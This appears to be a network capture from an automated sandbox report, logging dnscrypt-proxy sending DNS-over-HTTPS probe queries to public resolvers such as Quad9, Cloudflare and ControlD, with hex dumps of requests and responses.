                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:12 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 0b 7a 65 90 d9 a3 43 ff 1d 41 b1 56 bb 91 7e 72
                                                                                                                            Data Ascii: )zeCAV~r
                                                                                                                            2024-03-12 15:34:12 UTC260INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:12 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 823
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=518400
                                                                                                                            2024-03-12 15:34:12 UTC823INData Raw: ca fe 85 80 00 01 00 0d 00 00 00 1b 00 00 02 00 01 00 00 02 00 01 00 07 e9 00 00 14 01 68 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 c0 11 00 02 00 01 00 07 e9 00 00 04 01 63 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6d c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6b c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6c c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 67 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 65 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 69 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 64 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 61 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 66 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 62 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6a c0 1e c0 4c 00 01 00 01 00 07 e9 00 00 04 ca 0c 1b
                                                                                                                            Data Ascii: hroot-serversnetcmklgeidafbjL


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            48192.168.2.54978889.233.43.714437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:13 UTC282OUTPOST /dns-query?body_hash=fee21c609d4657a50e7a6b1fa5e62c217f2bf702a8db5264a3eff049b87926e0 HTTP/1.1
                                                                                                                            Host: unicast.uncensoreddns.org
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:13 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 73 6c 67 62 6a 6e 6c 62 67 6a 65 6e 72 72 71 66 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 2f 61 72 51 4b b5 90 f3 b2 a0 61 1a ba 14 04 85
                                                                                                                            Data Ascii: slgbjnlbgjenrrqftestdnscrypt)/arQKa
                                                                                                                            2024-03-12 15:34:13 UTC259INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:13 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 134
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=86400
                                                                                                                            2024-03-12 15:34:13 UTC134INData Raw: ca fe 85 83 00 01 00 00 00 01 00 01 10 73 6c 67 62 6a 6e 6c 62 67 6a 65 6e 72 72 71 66 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 01 51 80 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: slgbjnlbgjenrrqftestdnscryptQ@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            49192.168.2.54979076.76.2.114437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:19 UTC204OUTGET /p0?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABDpF0cJ_0VMvb7WLNuwQljl HTTP/1.1
                                                                                                                            Host: freedns.controld.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:34:19 UTC167INHTTP/1.1 200 OK
                                                                                                                            Accept: application/dns-message
                                                                                                                            Content-Length: 17
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:19 GMT
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:34:19 UTC17INData Raw: ca fe 81 85 00 01 00 00 00 00 00 00 00 00 02 00 01
                                                                                                                            Data Ascii:


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            50192.168.2.54979176.76.2.114437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:19 UTC246OUTGET /p0?dns=yv4BAAABAAAAAAABEGJ0cmNlbW5sbmVlbGFwb3MEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQwS0OcQQgp7MPiuxloY_p2Q HTTP/1.1
                                                                                                                            Host: freedns.controld.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            2024-03-12 15:34:19 UTC167INHTTP/1.1 200 OK
                                                                                                                            Accept: application/dns-message
                                                                                                                            Content-Length: 48
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:19 GMT
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:34:19 UTC48INData Raw: ca fe 81 85 00 01 00 00 00 00 00 00 10 62 74 72 63 65 6d 6e 6c 6e 65 65 6c 61 70 6f 73 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01
                                                                                                                            Data Ascii: btrcemnlneelapostestdnscrypt


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            51192.168.2.5497929.9.9.124437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:20 UTC276OUTPOST /dns-query?body_hash=9fc44fc275ac3655a48dcd61abdcdf35f8f327c450780fa276715b5b31f13ebd HTTP/1.1
                                                                                                                            Host: dns12.quad9.net:443
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:20 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 20 13 69 70 7d c2 6c eb 47 af aa 49 a0 0d 28 f9
                                                                                                                            Data Ascii: ) ip}lGI(
                                                                                                                            2024-03-12 15:34:20 UTC186INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:20 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 823
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=28629
                                                                                                                            2024-03-12 15:34:20 UTC823INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 1b 00 00 02 00 01 00 00 02 00 01 00 00 6f d5 00 14 01 6b 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 c0 11 00 02 00 01 00 00 6f d5 00 04 01 66 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 61 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 68 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 69 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 62 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 67 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 6c c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 6d c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 6a c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 64 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 63 c0 1e c0 11 00 02 00 01 00 00 6f d5 00 04 01 65 c0 1e c0 4c 00 01 00 01 00 00 6f d5 00 04 c6 29 00
                                                                                                                            Data Ascii: okroot-serversnetofoaohoiobogolomojodocoeLo)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            52192.168.2.5497939.9.9.124437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:21 UTC276OUTPOST /dns-query?body_hash=c78c64ca88650bec3d2cd918413a0a0ebfde98804767f31b70f692c81100b27d HTTP/1.1
                                                                                                                            Host: dns12.quad9.net:443
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:21 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 6b 65 62 79 6e 77 61 67 64 71 6e 75 6c 78 64 68 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 e7 5d 6b 3f fa 33 63 59 94 dd 00 ae 3e a3 58 9d
                                                                                                                            Data Ascii: kebynwagdqnulxdhtestdnscrypt)]k?3cY>X
                                                                                                                            2024-03-12 15:34:21 UTC186INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:21 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 134
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=10800
                                                                                                                            2024-03-12 15:34:21 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 6b 65 62 79 6e 77 61 67 64 71 6e 75 6c 78 64 68 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 2a 30 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: kebynwagdqnulxdhtestdnscrypt*0@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            53192.168.2.5497941.0.0.14437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:21 UTC275OUTPOST /dns-query?body_hash=13ddbd7274881d95d0d393066acc10526b8853fab97eb0ba630f7b6507c86dcd HTTP/1.1
                                                                                                                            Host: dns.cloudflare.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:21 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 62 e6 e5 66 ed a2 7d 31 e3 4c 2b a6 c4 f5 67 d9
                                                                                                                            Data Ascii: )bf}1L+g
                                                                                                                            2024-03-12 15:34:21 UTC217INHTTP/1.1 200 OK
                                                                                                                            Server: cloudflare
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:21 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Content-Length: 468
                                                                                                                            CF-RAY: 8634d911cd967286-EWR
                                                                                                                            2024-03-12 15:34:21 UTC468INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 07 d2 13 00 14 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 07 d2 13 00 04 01 62 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 63 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 64 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 65 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 66 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 67 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 68 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 69 c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 6a c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 6b c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 6c c0 1e 00 00 02 00 01 00 07 d2 13 00 04 01 6d c0 1e 00 00 29 04 d0 00 00 00 00 00 e5 00 0c 00 e1 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: aroot-serversnetbcdefghijklm)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            54192.168.2.5497951.0.0.14437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:22 UTC275OUTPOST /dns-query?body_hash=958fffaa5dce94ab590e2b3518ad5fd0c28909de4b03c2daf5e870bb5b69bb5d HTTP/1.1
                                                                                                                            Host: dns.cloudflare.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:22 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 7a 68 68 78 75 6c 70 62 6a 75 6e 79 73 64 78 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 a7 a6 4b d6 12 94 58 fb b8 ea 00 ff fb 0f ad 47
                                                                                                                            Data Ascii: zhhxulpbjunysdxutestdnscrypt)KXG
                                                                                                                            2024-03-12 15:34:22 UTC217INHTTP/1.1 200 OK
                                                                                                                            Server: cloudflare
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:22 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Content-Length: 468
                                                                                                                            CF-RAY: 8634d9148caa7d13-EWR
                                                                                                                            2024-03-12 15:34:22 UTC468INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 7a 68 68 78 75 6c 70 62 6a 75 6e 79 73 64 78 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 01 51 80 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 01 4e 00 0c 01 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: zhhxulpbjunysdxutestdnscryptQ@aroot-serversnetnstldverisign-grscomxC:Q)NJ


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            55192.168.2.549796172.104.93.804437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:23 UTC268OUTPOST /dns-query?body_hash=b9686c11d095428fe4a773b735e45105aa3ca2e0f6c6bed031bc3251d4864024 HTTP/1.1
                                                                                                                            Host: jp.tiar.app
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:23 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 3e 5f cb ec 30 18 51 b6 61 78 62 08 cc 44 f4 cc
                                                                                                                            Data Ascii: )>_0QaxbD
                                                                                                                            2024-03-12 15:34:24 UTC270INHTTP/1.1 200 OK
                                                                                                                            Content-Length: 260
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Cache-Control: max-age=71528, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:23 GMT
                                                                                                                            Connection: close
                                                                                                                            x-powered-by: Vaccines
                                                                                                                            2024-03-12 15:34:24 UTC260INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 01 17 68 00 14 01 68 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 01 17 68 00 04 01 64 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 63 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 6d c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 65 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 67 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 66 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 6b c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 6c c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 69 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 6a c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 62 c0 1e 00 00 02 00 01 00 01 17 68 00 04 01 61 c0 1e 00 00 29 04 d0 00 00 00 00 00 15 00 0c 00 11 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: hhroot-serversnethdhchmhehghfhkhlhihjhbha)XXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            56192.168.2.549797172.104.93.804437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:24 UTC268OUTPOST /dns-query?body_hash=934d9e2d79f308da31a15d1544b6a00a94a836d618e1dee515f1e6ee7b0e2377 HTTP/1.1
                                                                                                                            Host: jp.tiar.app
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:24 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 61 76 63 7a 6d 64 67 66 78 75 64 6b 6d 6e 63 7a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 21 d1 7e 7b 19 f1 f4 fd 0c 94 b1 c1 00 c1 d5 7b
                                                                                                                            Data Ascii: avczmdgfxudkmncztestdnscrypt)!~{{
                                                                                                                            2024-03-12 15:34:25 UTC268INHTTP/1.1 200 OK
                                                                                                                            Content-Length: 196
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Cache-Control: max-age=894, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:25 GMT
                                                                                                                            Connection: close
                                                                                                                            x-powered-by: Vaccines
                                                                                                                            2024-03-12 15:34:25 UTC196INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 61 76 63 7a 6d 64 67 66 78 75 64 6b 6d 6e 63 7a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 03 7e 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 3e 00 0c 00 3a 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: avczmdgfxudkmncztestdnscrypt~@aroot-serversnetnstldverisign-grscomxC:Q)>:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            57192.168.2.549798103.87.68.1944437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:27 UTC273OUTPOST /unfiltered?body_hash=820f363db0b23616d40e866b96aa3580e6311e31d3d850c3d6431480d1492fd2 HTTP/1.1
                                                                                                                            Host: dns.bebasid.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:27 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 de 53 f9 c1 87 d2 e1 fc 2e 1a b0 36 71 41 83 cf
                                                                                                                            Data Ascii: )S.6qA
                                                                                                                            2024-03-12 15:34:27 UTC410INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:27 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 160
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Origin: http://unfiltered.dns.bebasid.com
                                                                                                                            Vary: Origin
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            2024-03-12 15:34:27 UTC160INData Raw: ca fe 81 80 00 01 00 07 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 01 24 57 00 12 03 6e 73 36 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 01 24 57 00 07 04 6e 73 31 31 c0 20 00 00 02 00 01 00 01 24 57 00 06 03 6e 73 32 c0 20 00 00 02 00 01 00 01 24 57 00 06 03 6e 73 39 c0 20 00 00 02 00 01 00 01 24 57 00 06 03 6e 73 38 c0 20 00 00 02 00 01 00 01 24 57 00 06 03 6e 73 35 c0 20 00 00 02 00 01 00 01 24 57 00 06 03 6e 73 34 c0 20 00 00 29 10 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: $Wns6opennicglue$Wns11 $Wns2 $Wns9 $Wns8 $Wns5 $Wns4 )


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            58192.168.2.549799103.87.68.1944437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:28 UTC273OUTPOST /unfiltered?body_hash=8cc640301342daa3585752ffe3f77f3f8c2c207d83ab0bf9d3c2db6668d94a80 HTTP/1.1
                                                                                                                            Host: dns.bebasid.com
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:28 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 74 62 70 62 76 78 76 6c 76 63 6d 6c 67 6e 62 61 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 3b 4b 3d 28 28 8f e6 fb c3 dd df d7 68 5f 0c 2d
                                                                                                                            Data Ascii: tbpbvxvlvcmlgnbatestdnscrypt);K=((h_-
                                                                                                                            2024-03-12 15:34:29 UTC410INHTTP/1.1 200 OK
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Mar 2024 15:34:29 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 121
                                                                                                                            Connection: close
                                                                                                                            Access-Control-Allow-Origin: http://unfiltered.dns.bebasid.com
                                                                                                                            Vary: Origin
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            2024-03-12 15:34:29 UTC121INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 74 62 70 62 76 78 76 6c 76 63 6d 6c 67 6e 62 61 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 00 02 00 33 03 6e 73 30 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 0a 68 6f 73 74 6d 61 73 74 65 72 c0 3f 78 a4 43 ee 00 00 07 08 00 00 03 84 00 09 3a 80 00 00 0e 10 00 00 29 10 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: tbpbvxvlvcmlgnbatestdnscrypt3ns0opennicgluehostmaster?xC:)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            59192.168.2.54980289.38.131.384437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:34:44 UTC275OUTPOST /dns-query?body_hash=bb67f774694f805c3c1932a9c60f95103b0f14d38421790ea8b8bd31cf47d30f HTTP/1.1
                                                                                                                            Host: dnsnl.alekberg.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:34:44 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 5a 9c f4 9c ab 8f 5e 5d e8 de 79 86 04 76 44 f9
                                                                                                                            Data Ascii: )Z^]yvD
                                                                                                                            2024-03-12 15:34:45 UTC243INHTTP/1.1 200
                                                                                                                            content-length: 260
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=6931, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            date: Tue, 12 Mar 2024 15:34:44 GMT
                                                                                                                            connection: close
